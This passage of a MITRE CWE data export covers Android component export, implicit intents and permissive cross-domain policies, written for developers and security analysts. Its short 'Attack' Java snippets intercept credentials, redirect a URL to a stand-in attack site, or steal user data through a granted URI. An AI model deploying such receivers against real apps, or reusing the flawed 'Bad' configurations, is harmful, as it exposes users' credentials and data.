"CweID": "668",
"Nature": "CanPrecede",
"Ordinal": null,
"ViewID": "1000"
}
] | null |
[
{
"Description": "Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect \"sources\" (origins of input) with \"sinks\" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)",
"DetectionMethodID": "DM-14",
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "These cross-domain policy files mean to allow Flash and Silverlight applications hosted on other domains to access its data:",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "Flash crossdomain.xml :",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t<cross-domain-policy xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n\txsi:noNamespaceSchemaLocation=\"http://www.adobe.com/xml/schemas/PolicyFile.xsd\">\n\t<allow-access-from domain=\"*.example.com\"/>\n\t<allow-access-from domain=\"*\"/>\n\t</cross-domain-policy>\n```",
"IntroText": null,
"Language": "XML",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "Silverlight clientaccesspolicy.xml :",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t<?xml version=\"1.0\" encoding=\"utf-8\"?>\n\t<access-policy>\n\t<cross-domain-access>\n\t<policy>\n\t<allow-from http-request-headers=\"SOAPAction\">\n\t<domain uri=\"*\"/>\n\t</allow-from>\n\t<grant-to>\n\t<resource path=\"/\" include-subpaths=\"true\"/>\n\t</grant-to>\n\t</policy>\n\t</cross-domain-access>\n\t</access-policy>\n```",
"IntroText": null,
"Language": "XML",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "These entries are far too permissive, allowing any Flash or Silverlight application to send requests. A malicious application hosted on any other web site will be able to send requests on behalf of any user tricked into executing it.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": "DX-208"
}
] | null | null | null | null | 3
|
[
[
"284",
"285",
"863",
"942"
],
[
"284",
"923",
"942"
],
[
"697",
"183",
"942"
]
] |
[] |
926
|
Improper Export of Android Application Components
|
Variant
|
Simple
|
Incomplete
|
The Android application exports a component for use by other applications, but does not properly restrict which applications can launch the component or access the data it contains.
|
The attacks and consequences of improperly exporting a component may depend on the exported component:
- If access to an exported Activity is not restricted, any application will be able to launch the activity. This may allow a malicious application to gain access to sensitive information, modify the internal state of the application, or trick a user into interacting with the victim application while believing they are still interacting with the malicious application.
- If access to an exported Service is not restricted, any application may start and bind to the Service. Depending on the exposed functionality, this may allow a malicious application to perform unauthorized actions, gain access to sensitive information, or corrupt the internal state of the application.
- If access to a Content Provider is not restricted to only the expected applications, then malicious applications might be able to access the sensitive data. Note that in Android before 4.2, the Content Provider is automatically exported unless it has been explicitly declared as NOT exported.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Mobile",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
}
] |
[
{
"Impact": [
"Unexpected State",
"DoS: Crash, Exit, or Restart",
"DoS: Instability",
"Varies by Context"
],
"Likelihood": null,
"Note": "Other applications, possibly untrusted, can launch the Activity.",
"Scope": [
"Availability",
"Integrity"
]
},
{
"Impact": [
"Unexpected State",
"Gain Privileges or Assume Identity",
"DoS: Crash, Exit, or Restart",
"DoS: Instability",
"Varies by Context"
],
"Likelihood": null,
"Note": "Other applications, possibly untrusted, can bind to the Service.",
"Scope": [
"Availability",
"Integrity"
]
},
{
"Impact": [
"Read Application Data",
"Modify Application Data"
],
"Likelihood": null,
"Note": "Other applications, possibly untrusted, can read or modify the data that is offered by the Content Provider.",
"Scope": [
"Confidentiality",
"Integrity"
]
}
] |
[
{
"Description": "If they do not need to be shared by other applications, explicitly mark components with android:exported=\"false\" in the application manifest.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Build and Compilation"
],
"Strategy": "Attack Surface Reduction"
},
{
"Description": "If you only intend to use exported components between related apps under your control, use android:protectionLevel=\"signature\" in the xml manifest to restrict access to applications signed by you.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Build and Compilation"
],
"Strategy": "Attack Surface Reduction"
},
{
"Description": "Limit Content Provider permissions (read/write) as appropriate.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Build and Compilation",
"Architecture and Design"
],
"Strategy": "Attack Surface Reduction"
},
{
"Description": "Limit Content Provider permissions (read/write) as appropriate.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Build and Compilation",
"Architecture and Design"
],
"Strategy": "Separation of Privilege"
}
] | null | null | null | null |
[
{
"Authors": [
"Android Open Source Project"
],
"Edition": null,
"ExternalReferenceID": "REF-923",
"Publication": null,
"PublicationDay": "16",
"PublicationMonth": "07",
"PublicationYear": "2013",
"Publisher": null,
"Section": null,
"Title": "Security Tips",
"URL": "https://developer.android.com/training/articles/security-tips#ContentProviders",
"URLDate": "2023-04-07"
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2013-07-02",
"SubmissionName": "CWE Content Team",
"SubmissionOrganization": "MITRE",
"SubmissionReleaseDate": "2013-07-17",
"SubmissionVersion": "2.5",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "Expanded entry to be more general and include all types of Android components that may be improperly exported.",
"ModificationDate": "2014-01-22",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Potential_Mitigations, References",
"ModificationDate": "2014-02-18",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Background_Details",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, References, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2014-02-18",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Improper Restriction of Content Provider Export to Other Applications",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "285",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null |
[
{
"Description": "Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect \"sources\" (origins of input) with \"sinks\" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)",
"DetectionMethodID": "DM-14",
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This application is exporting an activity and a service in its manifest.xml:",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t<activity android:name=\"com.example.vulnerableApp.mainScreen\">\n```\n...* \n\t\t\t<intent-filter>\n\t\t\t```\n\t\t\t\t<action android:name=\"com.example.vulnerableApp.OPEN_UI\" />\n\t\t\t\t<category android:name=\"android.intent.category.DEFAULT\" />\n\t\t\t</intent-filter>\n```\n...* \n\t\t\t</activity>\n\t<service android:name=\"com.example.vulnerableApp.backgroundService\">\n\t```\n```\n...* \n\t\t\t<intent-filter>\n\t\t\t```\n\t\t\t\t<action android:name=\"com.example.vulnerableApp.START_BACKGROUND\" />\n\t\t\t</intent-filter>\n```\n...* \n\t\t\t</service>",
"IntroText": null,
"Language": "XML",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "Because these components have intent filters but have not explicitly set 'android:exported=false' elsewhere in the manifest, they are automatically exported so that any other application can launch them. This may lead to unintended behavior or exploits.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This application has created a content provider to enable custom search suggestions within the application:",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t<provider>\n\t\tandroid:name=\"com.example.vulnerableApp.searchDB\"\n\t\tandroid:authorities=\"com.example.vulnerableApp.searchDB\">\n\t</provider>\n```",
"IntroText": null,
"Language": "XML",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "Because this content provider is only intended to be used within the application, it does not need to be exported. However, in Android before 4.2, it is automatically exported thus potentially allowing malicious applications to access sensitive information.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
}
] | null | null | null |
[
"\n\nThere are three types of components that can be exported in an Android application.\n\n\n - An Activity is an application component that provides a UI for users to interact with. A typical application will have multiple Activity screens that perform different functions, such as a main Activity screen and a separate settings Activity screen.\n\n - A Service is an application component that is started by another component to execute an operation in the background, even after the invoking component is terminated. Services do not have a UI component visible to the user.\n\n - The Content Provider mechanism can be used to share data with other applications or internally within the same application.\n\n"
] | 1
|
[
[
"284",
"285",
"926"
]
] |
[] |
927
|
Use of Implicit Intent for Sensitive Communication
|
Variant
|
Simple
|
Incomplete
|
The Android application uses an implicit intent for transmitting sensitive data to other applications.
|
Since an implicit intent does not specify a particular application to receive the data, any application can process the intent by using an Intent Filter for that intent. This can allow untrusted applications to obtain sensitive data. There are two variations on the standard broadcast intent, ordered and sticky.
Ordered broadcast intents are delivered to a series of registered receivers in order of priority as declared by the Receivers. A malicious receiver can give itself a high priority and cause a denial of service by stopping the broadcast from propagating further down the chain. There is also the possibility of malicious data modification, as a receiver may also alter the data within the Intent before passing it on to the next receiver. The downstream components have no way of asserting that the data has not been altered earlier in the chain.
Sticky broadcast intents remain accessible after the initial broadcast. An old sticky intent will be broadcast again to any new receivers that register for it in the future, greatly increasing the chances of information exposure over time. Also, sticky broadcasts cannot be protected by permissions that may apply to other kinds of intents.
In addition, any broadcast intent may include a URI that references data that the receiving component does not normally have the privileges to access. The sender of the intent can include special privileges that grant the receiver read or write access to the specific URI included in the intent. A malicious receiver that intercepts this intent will also gain those privileges and be able to read or write the resource at the specified URI.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Mobile",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
}
] |
[
{
"Impact": [
"Read Application Data"
],
"Likelihood": null,
"Note": "Other applications, possibly untrusted, can read the data that is offered through the Intent.",
"Scope": [
"Confidentiality"
]
},
{
"Impact": [
"Varies by Context"
],
"Likelihood": null,
"Note": "The application may handle responses from untrusted applications on the device, which could cause it to perform unexpected or unauthorized actions.",
"Scope": [
"Integrity"
]
}
] |
[
{
"Description": "If the application only requires communication with its own components, then the destination is always known, and an explicit intent could be used.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
}
] |
[
{
"Description": "An Android application does not use FLAG_IMMUTABLE when creating a PendingIntent.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-4903",
"Reference": "CVE-2022-4903"
}
] | null | null | null |
[
{
"Authors": [
"Erika Chin",
"Adrienne Porter Felt",
"Kate Greenwood",
"David Wagner"
],
"Edition": null,
"ExternalReferenceID": "REF-922",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": "3.2.1",
"Title": "Analyzing Inter-Application Communication in Android",
"URL": "http://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf",
"URLDate": null
},
{
"Authors": [
"Android Open Source Project"
],
"Edition": null,
"ExternalReferenceID": "REF-923",
"Publication": null,
"PublicationDay": "16",
"PublicationMonth": "07",
"PublicationYear": "2013",
"Publisher": null,
"Section": null,
"Title": "Security Tips",
"URL": "https://developer.android.com/training/articles/security-tips#ContentProviders",
"URLDate": "2023-04-07"
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2013-07-09",
"SubmissionName": "CWE Content Team",
"SubmissionOrganization": "MITRE",
"SubmissionReleaseDate": "2013-07-17",
"SubmissionVersion": "2.5",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Description, References",
"ModificationDate": "2014-02-18",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2020-06-25",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Maintenance_Notes",
"ModificationDate": "2021-03-15",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, References, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2023-10-26",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "285",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
},
{
"CweID": "668",
"Nature": "ChildOf",
"Ordinal": null,
"ViewID": "1000"
}
] | null |
[
{
"Description": "Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect \"sources\" (origins of input) with \"sinks\" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)",
"DetectionMethodID": "DM-14",
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This application wants to create a user account in several trusted applications using one broadcast intent:",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tIntent intent = new Intent();\n\tintent.setAction(\"com.example.CreateUser\");\n\tintent.putExtra(\"Username\", uname_string);\n\tintent.putExtra(\"Password\", pw_string);\n\tsendBroadcast(intent);\n```",
"IntroText": null,
"Language": "Java",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "This application assumes only the trusted applications will be listening for the action. A malicious application can register for this action and intercept the user's login information, as below:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tIntentFilter filter = new IntentFilter(\"com.example.CreateUser\");\n\tMyReceiver receiver = new MyReceiver();\n\tregisterReceiver(receiver, filter);\n```",
"IntroText": null,
"Language": "Java",
"Nature": "Attack",
"Reference": null
},
{
"BodyText": "When a broadcast contains sensitive information, create an allowlist of applications that can receive the action using the application's manifest file, or programmatically send the intent to each individual intended receiver.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This application interfaces with a web service that requires a separate user login. It creates a sticky intent, so that future trusted applications that also use the web service will know who the current user is:",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tIntent intent = new Intent();\n\tintent.setAction(\"com.example.service.UserExists\");\n\tintent.putExtra(\"Username\", uname_string);\n\tsendStickyBroadcast(intent);\n```",
"IntroText": null,
"Language": "Java",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tIntentFilter filter = new IntentFilter(\"com.example.service.UserExists\");\n\tMyReceiver receiver = new MyReceiver();\n\tregisterReceiver(receiver, filter);\n```",
"IntroText": null,
"Language": "Java",
"Nature": "Attack",
"Reference": null
},
{
"BodyText": "Sticky broadcasts can be read by any application at any time, and so should never contain sensitive information such as a username.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This application is sending an ordered broadcast, asking other applications to open a URL:",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tIntent intent = new Intent();\n\tintent.setAction(\"com.example.OpenURL\");\n\tintent.putExtra(\"URL_TO_OPEN\", url_string);\n\tsendOrderedBroadcastAsUser(intent);\n```",
"IntroText": null,
"Language": "Java",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "Any application in the broadcast chain may alter the data within the intent. This malicious application is altering the URL to point to an attack site:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tpublic class CallReceiver extends BroadcastReceiver {\n\t\t@Override\n\t\tpublic void onReceive(Context context, Intent intent) {\n\t\t\tString Url = intent.getStringExtra(Intent.URL_TO_OPEN);\n\t\t\tattackURL = \"www.example.com/attack?\" + Url;\n\t\t\tsetResultData(attackURL);\n\t\t}\n\t}\n```",
"IntroText": null,
"Language": "Java",
"Nature": "Attack",
"Reference": null
},
{
"BodyText": "The final receiving application will then open the attack URL. Where possible, send intents to specific trusted applications instead of using a broadcast chain.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This application sends a special intent with a flag that allows the receiving application to read a data file for backup purposes.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tIntent intent = new Intent();\n\tintent.setAction(\"com.example.BackupUserData\");\n\tintent.setData(file_uri);\n\tintent.addFlags(FLAG_GRANT_READ_URI_PERMISSION);\n\tsendBroadcast(intent);\n```",
"IntroText": null,
"Language": "Java",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tpublic class CallReceiver extends BroadcastReceiver {\n\t\t@Override\n\t\tpublic void onReceive(Context context, Intent intent) {\n\t\t\tUri userData = intent.getData();\n\t\t\tstealUserData(userData);\n\t\t}\n\t}\n```",
"IntroText": null,
"Language": "Java",
"Nature": "Attack",
"Reference": null
},
{
"BodyText": "Any malicious application can register to receive this intent. Because of the FLAG_GRANT_READ_URI_PERMISSION included with the intent, the malicious receiver code can read the user's data.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": "DX-108"
}
] | null | null | null | null | 2
|
[
[
"284",
"285",
"927"
],
[
"664",
"668",
"927"
]
] |
[] |
286
|
Incorrect User Management
|
Class
|
Simple
|
Incomplete
|
The product does not properly manage a user within its environment.
|
Users can be assigned to the wrong group (class) of permissions resulting in unintended access rights to sensitive objects.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": "REALIZATION: This weakness is caused during implementation of an architectural security tactic.",
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Varies by Context"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Other"
]
}
] | null |
[
{
"Description": "Containerization product does not record a user's supplementary group ID, allowing bypass of group restrictions.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-36109",
"Reference": "CVE-2022-36109"
},
{
"Description": "Operating system assigns user to privileged wheel group, allowing the user to gain root privileges.",
"Link": "https://www.cve.org/CVERecord?id=CVE-1999-1193",
"Reference": "CVE-1999-1193"
}
